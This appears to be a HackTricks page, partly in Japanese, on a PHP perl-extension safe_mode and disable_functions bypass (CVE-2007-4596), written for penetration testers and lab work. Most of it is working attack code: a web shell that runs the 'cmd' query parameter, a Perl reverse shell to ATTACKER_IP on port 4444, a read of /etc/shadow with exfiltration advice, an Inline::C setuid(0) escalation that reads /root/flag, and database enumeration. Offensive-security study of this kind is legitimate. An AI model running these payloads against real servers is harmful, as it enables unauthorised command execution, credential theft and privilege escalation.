PHP Perl Extension Safe_mode Bypass Exploit

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

背景

The issue tracked as CVE-2007-4596 comes from the legacy perl PHP extension, which embeds a full Perl interpreter without honoring PHP’s safe_mode, disable_functions, or open_basedir controls. Any PHP worker that loads extension=perl.so gains unrestricted Perl eval, so command execution remains trivial even when all classic PHP process-spawning primitives are blocked. Although safe_mode disappeared in PHP 5.4, many outdated shared-hosting stacks and vulnerable labs still ship it, so this bypass is still valuable when you land on legacy control panels.

2025年にテスト可能な環境を構築する

  • 最後に公開されたビルド(perl-1.0.1、2013年1月)はPHP ≥5.0を対象としています。PECLから取得し、攻撃対象とする正確なPHPブランチ向けにコンパイルして、グローバルに(php.ini)またはdl()経由でロードしてください(許可されている場合)。
  • 簡易なDebianベースのラボ手順:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • エクスプロイト中はvar_dump(extension_loaded('perl'));print_r(get_loaded_extensions());で利用可能か確認してください。存在しない場合はperl.soを検索するか、書き込み可能なphp.ini/.user.iniエントリを悪用して強制ロードします。
  • インタプリタがPHPワーカー内に存在するため、外部バイナリは不要です — ネットワーク出口フィルタやproc_openのブラックリストは無関係です。

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, still handy to confirm the extension responds to eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Modern Payload Enhancements

1. Full TTY over TCP

組み込みインタプリタは、/usr/bin/perl がブロックされていても IO::Socket を読み込めます:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. open_basedir が有効でもファイルシステムを脱出

Perl は PHP の open_basedir を無視するため、任意のファイルを読み取れます:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

IO::Socket::INET または Net::HTTP を経由して出力をパイプし、PHP が管理するディスクリプタに触れずにデータを exfiltrate します。

3. Privilege Escalation のためのインラインコンパイル

システム全体に Inline::C が存在する場合、リクエスト内でヘルパーをコンパイルし、PHP の ffipcntl に依存せずに実行できます:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

PerlをLOLBASツールキットとして扱う — 例:mysqliが無くてもMySQLのDSNをダンプする:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

参考資料

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする